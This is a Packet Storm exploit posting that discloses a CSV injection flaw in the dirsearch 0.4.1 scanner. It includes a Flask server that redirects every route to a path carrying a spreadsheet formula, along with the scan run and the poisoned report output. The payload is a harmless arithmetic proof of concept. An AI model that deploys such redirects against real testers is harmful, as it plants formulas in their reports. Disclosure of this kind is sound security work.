exploit the possibilities

dirsearch 0.4.1 CSV Injection

dirsearch 0.4.1 CSV Injection
Posted Jan 6, 2021
Authored by Dolev Farhi

dirsearch version 0.4.1 suffers from a CSV injection vulnerability.

tags | exploit
SHA-256 | b5022b4e0c55eb58ea15dfa45187d46bb7b978e2077731949fd1ca7ede34f7b9

dirsearch 0.4.1 CSV Injection

Change Mirror Download
# Exploit Title: dirsearch 0.4.1 - CSV Injection
# Author: Dolev Farhi
# Date: 2021-01-05
# Vendor Homepage: https://github.com/maurosoria/dirsearch
# Version : 0.4.1
# Tested on: Debian 9.13

dirsearch, when used with the --csv-report flag, writes the results of crawled endpoints which redirect(, to a csv file without sanitization.
A malicious server can redirect all of its routes/paths to a path that contains a comma and formula, e.g. /test,=1336+1, and escape the normal dirsearch CSV structure to inject its own formula.

Malicious Flask Webserver:

"""
from flask import Flask, redirect
app = Flask(__name__)

@app.route('/')
def index():
return redirect('/test,=1336+1')

@app.route('/admin')
def admin():
return redirect('/test,=1336+1')

@app.route('/login')
def login():
return redirect('/test,=1336+1')
"""


2. Tester runs dirsearch
root@host:~/# python3 dirsearch.py -u http://10.0.0.1 --csv-report=report.csv


_|. _ _ _ _ _ _|_ v0.4.1
(_||| _) (/_(_|| (_| )

Extensions: php, asp, aspx, jsp, html, htm, js | HTTP method: GET | Threads: 30 | Wordlist size: 2

Error Log: /root/tools/dirsearch/logs/errors-21-01-06_04-29-10.log

Target: http://10.0.0.1

Output File: /root/tools/dirsearch/reports/10.0.0.1/_21-01-06_04-29-10.txt

[04:29:10] Starting:
[04:29:11] 302 - 233B - /admin -> http://10.0.0.1/test,=1336+1
[04:29:11] 302 - 233B - /login -> http://10.0.0.1/test,=1336+1


3. Result CSV

root@host:~/# cat report.csv

Time,URL,Status,Size,Redirection
Wed Jan 6 04:29:11 2021,http://10.0.0.1:80/admin,302,233,http://10.0.0.1/test,=1336+1
Wed Jan 6 04:29:11 2021,http://10.0.0.1:80/login,302,233,http://10.0.0.1/test,=1336+1

Login or Register to add favorites

File Archive:

May 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    0 Files
  • 2
    May 2nd
    15 Files
  • 3
    May 3rd
    19 Files
  • 4
    May 4th
    24 Files
  • 5
    May 5th
    15 Files
  • 6
    May 6th
    14 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    13 Files
  • 10
    May 10th
    7 Files
  • 11
    May 11th
    99 Files
  • 12
    May 12th
    45 Files
  • 13
    May 13th
    7 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close